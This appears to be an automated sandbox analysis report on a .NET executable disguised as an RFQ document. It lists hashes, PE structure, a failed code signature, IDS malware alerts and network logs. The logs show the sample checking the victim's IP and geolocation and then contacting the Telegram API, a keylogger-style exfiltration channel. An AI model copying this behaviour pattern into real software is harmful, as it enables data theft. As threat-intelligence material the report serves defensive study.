                                                                                                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              gem1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              CLOUDFLARENETUShttps://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.66.43.95
                                                                                                                                                                                              http://www.singhs.lvGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                              • 104.18.11.207
                                                                                                                                                                                              http://18ofcontents.shopGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                              https://www.dcamarketintelligence.com/tdtGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.26.15.92
                                                                                                                                                                                              1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                              https://cdn.btmessage.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 172.67.74.232
                                                                                                                                                                                              http://www.austrata.net.auGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 1.1.1.1
                                                                                                                                                                                              https://www.cineuserdad.ecGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              https://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.26.1.150
                                                                                                                                                                                              https://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                              ORACLE-BMC-31898USTepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
Process: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
MD5: E193AFF55D4BDD9951CB4287A7D79653
SHA1: F94AD920B9E0EB43B5005D74552AB84EAA38E985
SHA-256: 08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
SHA-512: 86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 6.976825506593515
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.96%
• Win16/32 Executable Delphi generic (2074/23) 0.01%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
File size: 842'624 bytes
MD5: 02bc82a10c674c5c8f60d293e22a544e
SHA1: 7b6aecdc2468eb633ddec37397e55fc778c824c2
SHA256: 8b672671606f402445e1d10caf2f59a41e36ae4201d189ac202f5c7c0c66f3a4
SHA512: db3d9771b2dff93f1117e5702be38808132519b656b87ae7fc99582882501911e2e8ff4ad23a70a63d7bfa7c55f3811d80eed42a835fa678b8e09f8e153a7d10
SSDEEP: 12288:QcGLc0gGcbsnxBGh6j0pSApXUFwK0g5MCao3AiqLwgDd7P//RIFLIs7Q:/iNgQ7YpdXgXgo3A9LZ7P/JIFLIs7Q
TLSH: 3505F1003705EC75FCB9043287B4C3FB42BCED1289A7959F19AE7957ACBD31A3AA1095
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...DZ.a.................@...>......^_... ........@.. ....................................`................................
Icon Hash: 74f0d4d4d4d4d4cc
Entrypoint: 0x4b5f5e
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x61DB5A44 [Sun Jan 9 21:57:24 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Signature Valid: false
Signature Issuer: CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
• 10/01/2022 00:00:00, 09/01/2025 23:59:59
Subject Chain:
• CN=DOS SANTOS DA SILVA ALFREDO, O=DOS SANTOS DA SILVA ALFREDO, S=Occitanie, C=FR, OID.2.5.4.15=Business Entity, OID.1.3.6.1.4.1.311.60.2.1.3=FR, SERIALNUMBER=789 849 163 00025
Version: 3
Thumbprint MD5: 969883F5E1C9A0AFDC8ECA5778CD455E
Thumbprint SHA-1: 0FFC830BD50362A6993425B973EFEA97BC8AEB0E
Thumbprint SHA-256: BB48064FA3A2272DD3B18C9D330293C867964D2880520CFA45ABEA00BE80BB9F
Serial: 009EB86320BC00ABF185BBDE0332C26F58
                                                                                                                                                                                              Instruction
                                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5f0c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb6000 | 0x13ac8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc8000 | 0x5b80 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xca000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb3f64 | 0xb4000 | 60bf729befb0af3bd969a1d891d20857 | False | 0.6221110026041666 | data | 6.98396364188515 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb6000 | 0x13ac8 | 0x13c00 | 3b35da8abd436ffa84ad1a516fa28b1b | False | 0.42601611946202533 | data | 6.0105573277605675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xca000 | 0xc | 0x200 | 9432aec11d32a7d72ee515f59585668c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb6658 | 0x42b0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9922680412371134
RT_ICON | 0xba908 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.4594882729211087
RT_ICON | 0xbb7b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.48826714801444043
RT_ICON | 0xbc058 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | | | 0.478110599078341
RT_ICON | 0xbc720 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.37210982658959535
RT_ICON | 0xbcc88 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.24201244813278008
RT_ICON | 0xbf230 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.2924484052532833
RT_ICON | 0xc02d8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.3942622950819672
RT_ICON | 0xc0c60 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.49379432624113473
RT_ICON | 0xc10c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | | | 0.33198924731182794
RT_ICON | 0xc13b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | | | 0.41216216216216217
RT_ICON | 0xc14d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | | | 0.42905405405405406
RT_ICON | 0xc1600 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | | | 0.2661290322580645
RT_ICON | 0xc18e8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | | | 0.18010752688172044
RT_ICON | 0xc1bd0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | | | 0.35135135135135137
RT_ICON | 0xc1cf8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.06092057761732852
RT_ICON | 0xc25a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.07658959537572255
RT_ICON | 0xc2b08 | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 3072 | | | 0.042901234567901236
RT_ICON | 0xc37b0 | 0x368 | Device independent bitmap graphic, 16 x 32 x 24, image size 768 | | | 0.10550458715596331
RT_ICON | 0xc3b18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.6400709219858156
RT_ICON | 0xc3f80 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | | | 0.5
RT_ICON | 0xc40a8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.19060283687943264
RT_ICON | 0xc4510 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | | | 0.11429872495446267
RT_ICON | 0xc5638 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | | | 0.07211147274206672
RT_ICON | 0xc7ca0 | 0x1952 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.7099660598580685
RT_GROUP_ICON | 0xc95f4 | 0x3e | data | | | 0.8709677419354839
RT_GROUP_ICON | 0xc9634 | 0x84 | data | | | 0.6893939393939394
RT_GROUP_ICON | 0xc96b8 | 0x22 | data | | | 1.0588235294117647
RT_GROUP_ICON | 0xc96dc | 0x22 | data | | | 1.0588235294117647
RT_GROUP_ICON | 0xc9700 | 0x5a | data | | | 0.7666666666666667
RT_GROUP_ICON | 0xc975c | 0x22 | data | | | 1.1176470588235294
RT_VERSION | 0xc9780 | 0x348 | data | English | United States | 0.4154761904761905
DLL | Import
mscoree.dll | _CorExeMain
                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                              EnglishUnited States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T09:29:19.770796+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49871 | 193.122.130.0 | 80 | TCP
2025-01-10T09:29:20.598929+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49871 | 193.122.130.0 | 80 | TCP
2025-01-10T09:29:21.137570+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49882 | 104.21.48.1 | 443 | TCP
2025-01-10T09:29:21.661416+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49885 | 193.122.130.0 | 80 | TCP
2025-01-10T09:29:24.456913+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49906 | 104.21.48.1 | 443 | TCP
2025-01-10T09:29:25.579354+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49915 | 104.21.80.1 | 443 | TCP
2025-01-10T09:29:26.637643+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49923 | 104.21.80.1 | 443 | TCP
2025-01-10T09:29:29.795113+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49946 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                              Jan 10, 2025 09:29:24.973948956 CET4991280192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.425906897 CET44349915104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.427561045 CET49915443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:25.427617073 CET44349915104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.579262972 CET44349915104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.579339981 CET44349915104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.579605103 CET49915443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:25.579844952 CET49915443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:25.584021091 CET4991280192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.585432053 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.589057922 CET8049912193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.589122057 CET4991280192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.590286016 CET8049918193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:25.590353966 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.590614080 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:25.595441103 CET8049918193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.044668913 CET8049918193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.045785904 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.045831919 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.045891047 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.046153069 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.046164989 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.098908901 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.500415087 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.511984110 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.512010098 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.637660027 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.637723923 CET44349923104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.637787104 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.642863035 CET49923443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:26.660450935 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.661369085 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.665441036 CET8049918193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.665498972 CET4991880192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.666179895 CET8049927193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:26.666245937 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.666353941 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:26.671201944 CET8049927193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.178261995 CET8049927193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.181241035 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.181246996 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.181417942 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.181626081 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.181637049 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.223939896 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.657891989 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.659462929 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.659502983 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.808928967 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.808999062 CET44349931104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.809225082 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.809442997 CET49931443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:27.812280893 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.813394070 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.817266941 CET8049927193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.817327976 CET4992780192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.818152905 CET8049936193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:27.818219900 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.818296909 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:27.823035955 CET8049936193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.276055098 CET8049936193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.279222965 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.279249907 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.279403925 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.279721975 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.279738903 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.317698002 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:28.762130022 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.764725924 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.764754057 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.893416882 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.893496037 CET44349940104.21.80.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.893553972 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.894026995 CET49940443192.168.2.4104.21.80.1
                                                                                                                                                                                              Jan 10, 2025 09:29:28.909579992 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:28.914675951 CET8049936193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.914752007 CET4993680192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:28.916816950 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:28.916862965 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:28.916930914 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:28.917311907 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:28.917325020 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.547259092 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.547363997 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:29.549150944 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:29.549159050 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.549405098 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.550815105 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:29.591332912 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.795135021 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.795186996 CET44349946149.154.167.220192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:29.795481920 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:29.801717997 CET49946443192.168.2.4149.154.167.220
                                                                                                                                                                                              Jan 10, 2025 09:29:45.825251102 CET4988580192.168.2.4193.122.130.0
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 10, 2025 09:29:19.096127987 CET  53968        53         192.168.2.4  1.1.1.1
Jan 10, 2025 09:29:19.102881908 CET  53           53968      1.1.1.1      192.168.2.4
Jan 10, 2025 09:29:19.764659882 CET  61095        53         192.168.2.4  1.1.1.1
Jan 10, 2025 09:29:19.771550894 CET  53           61095      1.1.1.1      192.168.2.4
Jan 10, 2025 09:29:24.927187920 CET  62429        53         192.168.2.4  1.1.1.1
Jan 10, 2025 09:29:24.934226990 CET  53           62429      1.1.1.1      192.168.2.4
Jan 10, 2025 09:29:28.909495115 CET  49482        53         192.168.2.4  1.1.1.1
Jan 10, 2025 09:29:28.916146994 CET  53           49482      1.1.1.1      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Jan 10, 2025 09:29:19.096127987 CET  192.168.2.4  1.1.1.1  0xcacf    Standard query (0)  checkip.dyndns.org   A (IP address)  IN (0x0001)  false
Jan 10, 2025 09:29:19.764659882 CET  192.168.2.4  1.1.1.1  0xfdd4    Standard query (0)  reallyfreegeoip.org  A (IP address)  IN (0x0001)  false
Jan 10, 2025 09:29:24.927187920 CET  192.168.2.4  1.1.1.1  0x5cbe    Standard query (0)  reallyfreegeoip.org  A (IP address)  IN (0x0001)  false
Jan 10, 2025 09:29:28.909495115 CET  192.168.2.4  1.1.1.1  0x9f70    Standard query (0)  api.telegram.org     A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                 CName               Address         Type                    Class        DNS over HTTPS
Jan 10, 2025 09:29:19.102881908 CET  1.1.1.1    192.168.2.4  0xcacf    No error (0)  checkip.dyndns.org   checkip.dyndns.com                  CNAME (Canonical name)  IN (0x0001)  false
Jan 10, 2025 09:29:19.102881908 CET  1.1.1.1    192.168.2.4  0xcacf    No error (0)  checkip.dyndns.com                       193.122.130.0   A (IP address)          IN (0x0001)  false
Jan 10, 2025 09:29:19.102881908 CET  1.1.1.1    192.168.2.4  0xcacf    No error (0)  checkip.dyndns.com                       132.226.8.169   A (IP address)          IN (0x0001)  false
Jan 10, 2025 09:29:19.102881908 CET  1.1.1.1    192.168.2.4  0xcacf    No error (0)  checkip.dyndns.com                       193.122.6.168   A (IP address)          IN (0x0001)  false
Jan 10, 2025 09:29:19.102881908 CET  1.1.1.1    192.168.2.4  0xcacf    No error (0)  checkip.dyndns.com                       158.101.44.242  A (IP address)          IN (0x0001)  false
Jan 10, 2025 09:29:19.102881908 CET  1.1.1.1    192.168.2.4  0xcacf    No error (0)  checkip.dyndns.com                       132.226.247.73  A (IP address)          IN (0x0001)  false
Jan 10, 2025 09:29:19.771550894 CET  1.1.1.1    192.168.2.4  0xfdd4    No error (0)  reallyfreegeoip.org                      104.21.48.1     A (IP address)          IN (0x0001)  false
Jan 10, 2025 09:29:19.771550894 CET  1.1.1.1    192.168.2.4  0xfdd4    No error (0)  reallyfreegeoip.org                      104.21.16.1     A (IP address)          IN (0x0001)  false
Jan 10, 2025 09:29:19.771550894 CET  1.1.1.1    192.168.2.4  0xfdd4    No error (0)  reallyfreegeoip.org                      104.21.64.1     A (IP address)          IN (0x0001)  false
Jan 10, 2025 09:29:19.771550894 CET  1.1.1.1    192.168.2.4  0xfdd4    No error (0)  reallyfreegeoip.org                      104.21.96.1     A (IP address)          IN (0x0001)  false
Jan 10, 2025 09:29:19.771550894 CET  1.1.1.1    192.168.2.4  0xfdd4    No error (0)  reallyfreegeoip.org                      104.21.32.1     A (IP address)          IN (0x0001)  false
Jan 10, 2025 09:29:19.771550894 CET  1.1.1.1    192.168.2.4  0xfdd4    No error (0)  reallyfreegeoip.org                      104.21.80.1     A (IP address)          IN (0x0001)  false
Jan 10, 2025 09:29:19.771550894 CET  1.1.1.1    192.168.2.4  0xfdd4    No error (0)  reallyfreegeoip.org                      104.21.112.1    A (IP address)          IN (0x0001)  false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
